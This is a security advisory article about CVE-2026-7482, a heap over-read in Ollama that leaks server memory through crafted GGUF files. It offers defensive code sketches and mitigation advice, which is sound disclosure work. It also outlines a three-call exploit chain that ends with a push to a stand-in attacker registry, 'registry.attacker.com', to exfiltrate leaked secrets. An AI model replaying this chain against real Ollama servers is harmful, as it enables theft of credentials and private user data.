Bleeding Llama: Critical Unauthenticated Memory Leak Hits 300,000 Ollama Servers

Cyera Research disclosed CVE-2026-7482 (“Bleeding Llama”) on May 5, 2026 — a critical, unauthenticated heap out-of-bounds read in Ollama, the popular framework for running LLMs locally. The flaw, scored CVSS 9.1 by the issuing CNA (Echo lists it as 9.3), lets an attacker exfiltrate sensitive data straight out of the server’s memory in just three API calls. Ollama patched the issue in version 0.17.1; researchers estimate roughly 300,000 internet-exposed instances were vulnerable when the CVE was published.


What the Vulnerability Does

The bug lives in Ollama’s model quantization pipeline — specifically the WriteTo and ConvertToF32 functions that handle GGUF (GPT-Generated Unified Format) files. When Ollama processes a user-supplied GGUF, it trusts the tensor dimensions declared inside the file without checking them against the actual buffer it has allocated in memory. An attacker who crafts a GGUF that claims a tensor is far larger than it really is can force Ollama to read hundreds of kilobytes — or more — of adjacent heap memory.
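The missing check can be illustrated with a short sketch. This is not Ollama's code (Ollama is written in Go, and its actual fix is not shown in this article); the function names, the two-entry type table, and the error messages below are hypothetical. The idea is only that the size implied by the declared dimensions is compared with the bytes actually available before anything is read.

```python
import math

# Bytes per element for two tensor types (illustrative subset, not a full GGUF table).
BYTES_PER_ELEMENT = {"F32": 4, "F16": 2}


def declared_tensor_bytes(shape, dtype):
    """Size in bytes implied by the dimensions declared in the file header."""
    return math.prod(shape) * BYTES_PER_ELEMENT[dtype]


def check_tensor_bounds(shape, dtype, offset, buffer_len):
    """Raise ValueError if the declared tensor does not fit in the real buffer.

    Hypothetical helper: `offset` is where the tensor data starts and
    `buffer_len` is how many bytes were actually allocated.
    """
    if offset < 0 or any(dim < 0 for dim in shape):
        raise ValueError("negative offset or dimension")
    needed = declared_tensor_bytes(shape, dtype)
    available = max(0, buffer_len - offset)
    if needed > available:
        raise ValueError(
            f"tensor claims {needed} bytes at offset {offset}, "
            f"but only {available} are available"
        )
    return needed
```

A file that declares a 1024 x 1024 F16 tensor but ships only 32 bytes of data would be rejected here instead of being read past the end of the allocation.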

Because the conversion path triggered (F16 → F32) is lossless, every leaked byte is preserved perfectly inside the resulting model file. The attacker then calls Ollama’s /api/push endpoint, which accepts arbitrary registry hostnames, to send the now data-poisoned model directly to a server they control.
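Why lossless conversion matters can be checked with the standard library alone. The sketch below widens every non-NaN 16-bit half-precision pattern to F32 and narrows it back, then counts patterns that fail to survive. The helper names are hypothetical, and NaN patterns are skipped only because Python's `struct` module is not guaranteed to preserve NaN payload bits; that is a limit of this demonstration, not a statement about Ollama's converter.

```python
import struct


def f16_bits_survive_f32(bits):
    """Widen one 16-bit half-precision pattern to F32 and narrow it back."""
    half = struct.unpack("<e", struct.pack("<H", bits))[0]
    as_f32 = struct.pack("<f", half)  # stands in for the converted weight
    back = struct.pack("<e", struct.unpack("<f", as_f32)[0])
    return struct.unpack("<H", back)[0] == bits


def is_nan_pattern(bits):
    """True for half-precision NaN encodings (exponent all ones, mantissa non-zero)."""
    return (bits & 0x7C00) == 0x7C00 and (bits & 0x03FF) != 0


def count_mismatches():
    """Count non-NaN 16-bit patterns that do not round-trip through F32."""
    return sum(
        1
        for bits in range(0x10000)
        if not is_nan_pattern(bits) and not f16_bits_survive_f32(bits)
    )


if __name__ == "__main__":
    print(count_mismatches())
```

Every finite half-precision value is exactly representable in single precision, so no mismatches are expected. In practical terms, two leaked heap bytes reinterpreted as an F16 value can be recovered from the F32 weight that ends up in the model file.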

The Three-Call Exploit



The full attack chain requires no authentication, no user interaction, and no privileged access:

1. `POST /api/blobs/sha256:<hash>`: upload the malicious GGUF blob.

2. `POST /api/create`: create a model from the blob and request quantization. Ollama reads past the buffer and bakes the leaked memory into the model weights.

3. `POST /api/push` with `"name": "registry.attacker.com/leaked-model"`: exfiltrate the model, and the embedded heap data, to the attacker’s registry.

The attack succeeds silently. Ollama logs no errors, and the server does not crash — making detection difficult without dedicated monitoring of the /api/create and /api/push endpoints.
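One way to approach that monitoring is to look for the three-call sequence per client. The sketch below is a starting point, not a detection rule from any of the cited sources: it assumes request logs have already been parsed into `(client, method, path)` tuples in time order, which is a hypothetical format, and the function name is invented for illustration.

```python
from collections import defaultdict

# The three-call sequence described above, as (method, path prefix) pairs.
CHAIN = [
    ("POST", "/api/blobs/"),
    ("POST", "/api/create"),
    ("POST", "/api/push"),
]


def find_suspicious_clients(events):
    """Return clients whose requests contain the full chain in order.

    `events` is an iterable of (client, method, path) tuples in time order;
    this layout is an assumed, already-parsed log format.
    """
    progress = defaultdict(int)  # client -> index of the next expected step
    flagged = []
    for client, method, path in events:
        step = progress[client]
        if step >= len(CHAIN):
            continue  # this client has already been flagged
        want_method, want_prefix = CHAIN[step]
        if method == want_method and path.startswith(want_prefix):
            progress[client] = step + 1
            if progress[client] == len(CHAIN):
                flagged.append(client)
    return flagged
```

Legitimate users who build and publish their own models produce the same sequence, so a match is a lead to investigate rather than proof of exploitation. Checking the registry hostname in the push request body against an allowlist would narrow the results further.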

What Can Leak — and Why 300,000 Servers Are Exposed

Whatever happens to be on Ollama’s heap is fair game: system prompts, fragments of other users’ chat messages, environment variables (which often contain API keys, OpenAI/Anthropic tokens, database credentials, and cloud service secrets), code being processed by inference jobs, and any PII or PHI flowing through the model. Cyera’s writeup puts it bluntly: “An attacker can learn basically anything about the organization from your AI inference — API keys, proprietary code, customer contracts, and much more.”

The exposure surface is enormous because Ollama’s defaults are permissive. The server binds to 0.0.0.0 on launch and ships with no authentication. SecurityWeek reports approximately 300,000 internet-facing Ollama deployments. That is well above the 175,000 instances across 130 countries that researchers found in January 2026, as reported by The Hacker News.
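Operators can audit their own configuration for this. The sketch below classifies a bind address of the kind set through the `OLLAMA_HOST` environment variable as loopback-only or not. The function name and the parsing rules are assumptions made for illustration and may not match how Ollama itself parses the value.

```python
import ipaddress


def is_loopback_only(ollama_host):
    """Return True if an OLLAMA_HOST-style value binds only to loopback."""
    value = ollama_host.strip()
    # Drop an optional scheme, e.g. "http://0.0.0.0:11434".
    if "://" in value:
        value = value.split("://", 1)[1]
    value = value.split("/", 1)[0]
    # Separate host from port; bracketed IPv6 looks like "[::1]:11434".
    if value.startswith("["):
        host = value[1:].split("]", 1)[0]
    elif value.count(":") == 1:
        host = value.split(":", 1)[0]
    else:
        host = value  # bare hostname, IPv4 address, or unbracketed IPv6
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # unknown hostname: treat as potentially exposed
```

For example, `is_loopback_only("127.0.0.1:11434")` is true while `is_loopback_only("0.0.0.0")` is false. A loopback bind is only part of the picture, since a reverse proxy or port forward can still publish the API.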

Disclosure Timeline and the CVE Delay

Dor Attias (Cyera Research) reported the vulnerability to Ollama on February 2, 2026. Ollama acknowledged and shared a fix on February 25, and the patch shipped in version 0.17.1. The CVE itself, however, took nearly three months to land: a request to MITRE on March 2 went unanswered, prompting Cyera to escalate to Echo, a third-party CNA, which assigned CVE-2026-7482 on April 28 and published it May 1. Echo notes that without a CVE number, the vulnerability stayed invisible to scanners and feeds — and the original patch’s release notes did not flag it as a security update, so many operators never realized they should upgrade.

What to Do

- Upgrade to Ollama 0.17.1 or later immediately.

- Audit network exposure: Ollama should not be reachable from the public internet. Bind it to `127.0.0.1` or restrict access via firewall rules.

- Put authentication in front: a reverse proxy with auth (e.g., Cloudflare Access, an OAuth proxy, or Tailscale) closes the unauthenticated-API gap that makes this and similar bugs trivially exploitable.

- Treat any internet-exposed pre-0.17.1 instance as compromised — rotate any credentials, API keys, and secrets that may have lived in that server’s environment.
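For fleets with many instances, the upgrade check can be scripted. The sketch below compares a version string against 0.17.1, the fixed release named in this article. The version text could come from `ollama --version` or the server's `/api/version` endpoint; how it is collected is left out, and the helper names are hypothetical.

```python
import re

PATCHED = (0, 17, 1)  # first fixed release named in this article


def parse_version(text):
    """Extract (major, minor, patch) from strings like 'v0.17.1' or '0.17.1-rc2'."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if match is None:
        raise ValueError(f"unrecognized version string: {text!r}")
    return tuple(int(part) for part in match.groups())


def needs_upgrade(version_text):
    """True if the version is older than the patched release.

    Simplification: pre-release suffixes are ignored, so '0.17.1-rc2'
    is treated the same as '0.17.1'.
    """
    return parse_version(version_text) < PATCHED
```

Comparing integer tuples rather than raw strings matters here: as text, "0.9.12" sorts after "0.17.1", but numerically it is the older release.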

Related Coverage

- Ollama: Lightweight Framework for Language Models — our 2023 introduction to the project.

- LLMFuzzer: Tools to Test the Security of LLM APIs — earlier coverage of LLM-API security tooling.

Sources

- Bleeding Llama: Critical Unauthenticated Memory Leak in Ollama — Cyera Research

- CVE-2026-7482: Critical Ollama memory vulnerability explained — Echo

- Critical Bug Could Expose 300,000 Ollama Deployments to Information Theft — SecurityWeek

- CVE-2026-7482 — Vulnerability-Lookup (CIRCL)

- Researchers Find 175,000 Publicly Exposed Ollama AI Servers Across 130 Countries — The Hacker News

Shanghai Public Network Security Filing No. 31011502017015
